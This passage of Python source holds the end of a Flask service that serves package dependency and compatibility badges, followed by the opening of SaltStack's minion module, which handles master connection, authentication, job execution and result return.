details = ast.literal_eval(dependency_res.decode('utf-8'))
except SyntaxError:
logging.error(
'Error occurs while converting to dict, value is {}.'.format(
dependency_res))
details = DEP_CONVERSION_ERROR_RES
else:
details = DEFAULT_DEPENDENCY_RESULT
url = _get_badge_url(details, package_name)
response = flask.make_response(requests.get(url).text)
response.content_type = SVG_CONTENT_TYPE
response.headers['Cache-Control'] = 'no-cache'
response.add_etag()
return response
@app.route('/self_dependency_badge_target')
def self_dependency_badge_target():
"""Return a dict that contains dependency status and details."""
package_name = flask.request.args.get('package')
result_dict = _get_dependency_result_from_cache(package_name)
return flask.render_template(
'dependency-result.html',
package_name=package_name,
result=result_dict)
@app.route('/google_compatibility_badge_image')
def google_compatibility_badge_image():
"""Badge showing whether a package is compatible with Google OSS Python
packages. If all packages success, status is SUCCESS; else set status
to one of the failure types, details can be found at the target link."""
package_name = flask.request.args.get('package')
def run_check():
pkg_sets = [[package_name, pkg] for pkg in configs.PKG_LIST]
if package_name in configs.PKG_LIST:
result = _get_pair_status_for_packages(pkg_sets)
else:
version_and_res = {
'py2': {
'status': 'SUCCESS',
'details': {},
},
'py3': {
'status': 'SUCCESS',
'details': {},
}
}
for py_ver in [2, 3]:
results = list(checker.get_pairwise_compatibility(
py_ver, pkg_sets))
logging.warning(results)
py_version = PY_VER_MAPPING[py_ver]
for res in results:
res_item = res[0]
status = res_item.get('result')
package = res_item.get('packages')[1]
if status != 'SUCCESS':
# Ignore the package that not support for given py_ver
if package in \
configs.PKG_PY_VERSION_NOT_SUPPORTED.get(
py_ver):
continue
# Status showing one of the check failures
version_and_res[
py_version]['status'] = res_item.get('result')
description = res_item.get('description')
details = EMPTY_DETAILS if description is None \
else description
version_and_res[
py_version]['details'][package] = details
result = version_and_res
# Write the result to memory store
redis_client.set(
'{}_google_comp_badge'.format(package_name), result)
url = _get_badge_url(result, package_name)
return requests.get(url).text
google_comp_res = redis_client.get(
'{}_google_comp_badge'.format(package_name))
threading.Thread(target=run_check).start()
if google_comp_res is not None:
try:
details = ast.literal_eval(google_comp_res.decode('utf-8'))
except SyntaxError:
logging.error(
'Error occurs while converting to dict, value is {}.'.format(
google_comp_res))
details = CONVERSION_ERROR_RES
else:
details = DEFAULT_COMPATIBILITY_RESULT
url = _get_badge_url(details, package_name)
response = flask.make_response(requests.get(url).text)
response.content_type = SVG_CONTENT_TYPE
response.headers['Cache-Control'] = 'no-cache'
response.add_etag()
return response
@app.route('/google_compatibility_badge_target')
def google_compatibility_badge_target():
"""Return the dict which contains the compatibility status with google
packages and details for py2 and py3.
e.g. {
'py2':{
'status': 'SUCCESS',
'details': None,
},
'py3':{
'status': 'CHECK_WARNING',
'details': {
'package1': '...',
},
}
}
"""
package_name = flask.request.args.get('package')
result_dict = _get_google_compatibility_from_cache(package_name)
return flask.render_template(
'google-compatibility.html',
package_name=package_name,
result=result_dict)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080)
|
minion.py | # -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import print_function
import copy
import errno
import fnmatch
import hashlib
import logging
import multiprocessing
import os
import re
import salt
import signal
import sys
import threading
import time
import traceback
import types
from random import randint, shuffle
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
# Import salt libs
from salt.exceptions import (
AuthenticationError, CommandExecutionError, CommandNotFoundError,
SaltInvocationError, SaltReqTimeoutError, SaltClientError,
SaltSystemExit
)
import salt.client
import salt.crypt
import salt.loader
import salt.payload
import salt.utils
import salt.utils.args
import salt.utils.event
import salt.utils.schedule
from salt._compat import string_types
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
import salt.syspaths
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if opts.get('file_client', 'remote') == 'local' and check_dns:
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: {0} not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.warn(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
err = 'Master address: {0} could not be resolved. Invalid or unresolveable address.'.format(
opts.get('master', 'Unknown'))
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def get_proc_dir(cachedir):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
'''
fn_ = os.path.join(cachedir, 'proc')
if not os.path.isdir(fn_):
# proc_dir is not present, create it
os.makedirs(fn_)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or string_kwarg.keys()[0] in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}'.format(arg))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in arg.iteritems():
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}'.format(arg))
continue
else:
_args.append(arg)
if invalid_kwargs:
raise SaltInvocationError(
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in data.items():
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
class SMinion(object):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if self.opts.get('file_client', 'remote') == 'remote':
if isinstance(self.opts['master'], list):
masters = self.opts['master']
if self.opts['random_master'] is True:
shuffle(masters)
self.opts['_safe_auth'] = False
for master in masters:
self.opts['master'] = master
self.opts.update(resolve_dns(opts))
try:
self.gen_modules()
break
except SaltClientError:
log.warning(('Attempted to authenticate with master '
'{0} and failed'.format(master)))
continue
else:
if self.opts['random_master'] is True:
log.warning('random_master is True but there is only one master specified. Ignoring.')
self.opts.update(resolve_dns(opts))
self.gen_modules()
else:
self.gen_modules()
def gen_modules(self):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.functions = salt.loader.minion_mods(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
def _init_context_and_poller(self):
self.context = zmq.Context()
self.poller = zmq.Poller()
def _prepare_minion_event_system(self):
# Prepare the minion event system
#
# Start with the publish socket
self._init_context_and_poller()
hash_type = getattr(hashlib, self.opts.get('hash_type', 'md5'))
# Only use the first 10 chars to keep longer hashes from exceeding the
# max socket path length.
id_hash = hash_type(self.opts['id']).hexdigest()[:10]
epub_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pub.ipc'.format(id_hash)
)
if os.path.exists(epub_sock_path):
os.unlink(epub_sock_path)
epull_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pull.ipc'.format(id_hash)
)
if os.path.exists(epull_sock_path):
os.unlink(epull_sock_path)
self.epub_sock = self.context.socket(zmq.PUB)
if self.opts.get('ipc_mode', '') == 'tcp':
epub_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pub_port']
)
epull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pull_port']
)
else:
epub_uri = 'ipc://{0}'.format(epub_sock_path)
salt.utils.check_ipc_path_max_len(epub_uri)
epull_uri = 'ipc://{0}'.format(epull_sock_path)
salt.utils.check_ipc_path_max_len(epull_uri)
log.debug(
'{0} PUB socket URI: {1}'.format(
self.__class__.__name__, epub_uri
)
)
log.debug(
'{0} PULL socket URI: {1}'.format(
self.__class__.__name__, epull_uri
)
)
# Check to make sure the sock_dir is available, create if not
default_minion_sock_dir = os.path.join(
salt.syspaths.SOCK_DIR,
'minion'
)
minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir)
if not os.path.isdir(minion_sock_dir):
# Let's try to create the directory defined on the configuration
# file
try:
os.makedirs(minion_sock_dir, 0755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's not fail yet and try using the default path
if minion_sock_dir == default_minion_sock_dir:
# We're already trying the default system path, stop now!
raise
if not os.path.isdir(default_minion_sock_dir):
try:
os.makedirs(default_minion_sock_dir, 0755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's stop at this stage
raise
# Create the pull socket
self.epull_sock = self.context.socket(zmq.PULL)
# Securely bind the event sockets
if self.opts.get('ipc_mode', '') != 'tcp':
old_umask = os.umask(0177)
try:
log.info('Starting pub socket on {0}'.format(epub_uri))
self.epub_sock.bind(epub_uri)
log.info('Starting pull socket on {0}'.format(epull_uri))
self.epull_sock.bind(epull_uri)
finally:
if self.opts.get('ipc_mode', '') != 'tcp':
os.umask(old_umask)
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules()
def gen_modules(self):
'''
Load all of the modules for the minion
'''
self.functions = salt.loader.minion_mods(
self.opts,
whitelist=self.whitelist)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts, self.functions)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
def _gen_minions(self):
'''
Set up and tune in the minion options
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
return False
minions = []
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
try:
minions.append(Minion(s_opts, 5, False))
except SaltClientError:
minions.append(s_opts)
return minions
def minions(self):
'''
Return a list of minion generators bound to the tune_in method
'''
ret = {}
minions = self._gen_minions()
for minion in minions:
if isinstance(minion, dict):
ret[minion['master']] = minion
else:
ret[minion.opts['master']] = {
'minion': minion,
'generator': minion.tune_in_no_block()}
return ret
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
'''
self._prepare_minion_event_system()
self.poller.register(self.epull_sock, zmq.POLLIN)
module_refresh = False
pillar_refresh = False
# Prepare the minion generators
minions = self.minions()
loop_interval = int(self.opts['loop_interval'])
last = time.time()
auth_wait = self.opts['acceptance_wait_time']
max_wait = auth_wait * 6
while True:
for minion in minions.values():
if isinstance(minion, dict):
minion = minion['minion']
if not hasattr(minion, 'schedule'):
continue
loop_interval = self.process_schedule(minion, loop_interval)
socks = dict(self.poller.poll(1))
if socks.get(self.epull_sock) == zmq.POLLIN:
try:
while True:
package = self.epull_sock.recv(zmq.NOBLOCK)
if package.startswith('module_refresh'):
module_refresh = True
elif package.startswith('pillar_refresh'):
pillar_refresh = True
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
self.epub_sock.send(package)
except Exception:
pass
# get commands from each master
for master, minion in minions.items():
if 'generator' not in minion:
if time.time() - auth_wait > last:
last = time.time()
if auth_wait < max_wait:
auth_wait += auth_wait
try:
if not isinstance(minion, dict):
minions[master] = {'minion': minion}
t_minion = Minion(minion, 5, False)
minions[master]['minion'] = t_minion
minions[master]['generator'] = t_minion.tune_in_no_block()
auth_wait = self.opts['acceptance_wait_time']
except SaltClientError:
continue
else:
continue
if module_refresh:
minion['minion'].module_refresh()
if pillar_refresh:
minion['minion'].pillar_refresh()
minion['generator'].next()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True):
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ and (not(hasattr(zmq, 'zmq_version_info')) or
zmq.zmq_version_info() < (3, 2)):
# PyZMQ 2.1.9 does not have zmq_version_info
log.warning('You have a version of ZMQ less than ZMQ 3.2! There '
'are known connection keep-alive issues with ZMQ < '
'3.2 which may result in loss of contact with '
'minions. Please upgrade your ZMQ!')
# Late setup the of the opts grains, so we can log from the grains
# module
opts['grains'] = salt.loader.grains(opts)
# check if master_type was altered from its default
if opts['master_type'] != 'str':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(1)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if type(opts['master']) is list:
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(1)
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(1)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if type(opts['master']) is list:
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
if opts['master_shuffle']:
shuffle(local_masters)
for master in local_masters:
opts['master'] = master
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
try:
if self.authenticate(timeout, safe) != 'full':
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
msg = ('No master could be reached or all masters denied '
'the minions connection attempt.')
log.error(msg)
# single master sign in
else:
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
if self.authenticate(timeout, safe) == 'full':
msg = ('master {0} rejected the minions connection because too '
'many minions are already connected.'.format(opts['master']))
log.error(msg)
sys.exit(1)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment'],
).compile_pillar()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.functions, self.returners = self._load_modules()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
})
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2
}
})
self.grains_cache = self.opts['grains']
if 'proxy' in self.opts['pillar']:
log.debug('I am {0} and I need to start some proxies for {0}'.format(self.opts['id'],
self.opts['pillar']['proxy']))
for p in self.opts['pillar']['proxy']:
log.debug('Starting {0} proxy.'.format(p))
pid = os.fork()
if pid > 0:
continue
else:
proxyminion = salt.ProxyMinion()
proxyminion.start(self.opts['pillar']['proxy'][p])
self.clean_die(signal.SIGTERM, None)
else:
log.debug('I am {0} and I am not supposed to start any proxies. '
'(Likely not a problem)'.format(self.opts['id']))
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in self.opts.items():
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).get_memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
functions = salt.loader.minion_mods(self.opts)
returners = salt.loader.returners(self.opts, functions)
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners
def _fire_master(self, data=None, tag=None, events=None, pretag=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load)
except AuthenticationError:
log.info("AES key changed, re-authenticating")
self.authenticate()
except SaltReqTimeoutError:
log.info("Master failed to respond. Preforming re-authenticating")
self.authenticate()
except Exception:
log.info("fire_master failed: {0}".format(traceback.format_exc()))
def _handle_payload(self, payload):
'''
Takes a payload from the master publisher and does whatever the
master wants done.
'''
{'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[payload['enc']](payload['load'],
payload['sig'] if 'sig' in payload else None)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, checks the signature if pub signatures
are turned on, decrypts it, and runs the encapsulated instructions
'''
# Verify that the signature is valid
master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub')
if sig and self.functions['config.get']('sign_pub_messages'):
if not salt.crypt.verify_signature(master_pubkey_path, load, sig):
raise AuthenticationError('Message signature failed to validate.')
try:
data = self.crypticle.loads(load)
except AuthenticationError:
# decryption of the payload failed, try to re-auth but wait
# random seconds if set in config with random_reauth_delay
if 'random_reauth_delay' in self.opts:
reauth_delay = randint(0, int(self.opts['random_reauth_delay']))
log.debug('Waiting {0} seconds to re-authenticate'.format(reauth_delay))
time.sleep(reauth_delay)
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'arg' not in data:
return
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in data:
match_func = getattr(self.matcher,
'{0}_match'.format(data['tgt_type']), None)
if match_func is None or not match_func(data['tgt']):
return
else:
if not self.matcher.glob_match(data['tgt']):
return
# If the minion does not have the function, don't execute,
# this prevents minions that could not load a minion module
# from returning a predictable exception
#if data['fun'] not in self.functions:
# return
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_pub(self, load):
'''
Handle public key payloads
'''
pass
def _handle_clear(self, load):
'''
Handle un-encrypted transmissions
'''
pass
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if isinstance(data['fun'], string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target, args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
sys.modules[func.__module__].__context__['retcode'] = 0
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, list):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = sys.modules[func.__module__].__context__.get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info=log.isEnabledFor(logging.DEBUG)
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info=log.isEnabledFor(logging.DEBUG)
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
trb = traceback.format_exc()
aspec = salt.utils.get_function_argspec(
minion_instance.functions[data['fun']]
)
msg = ('TypeError encountered executing {0}: {1}. See '
'debug log for more info. Possibly a missing '
'arguments issue: {2}').format(function_name,
exc,
aspec)
log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = '{0!r} is not available.'.format(function_name)
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
minion_instance._return_pub(ret)
if data['ret']:
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
minion_instance._return_pub(ret)
if data['ret']:
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return'):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'load': ret.get('__load__')}
load['return'] = {}
for key, value in ret.items():
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in ret.items():
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = channel.send(load)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider incresing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
if isinstance(ret_val, string_types) and not ret_val:
# The master AES key has changed, reauth
self.authenticate()
ret_val = channel.send(load)
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
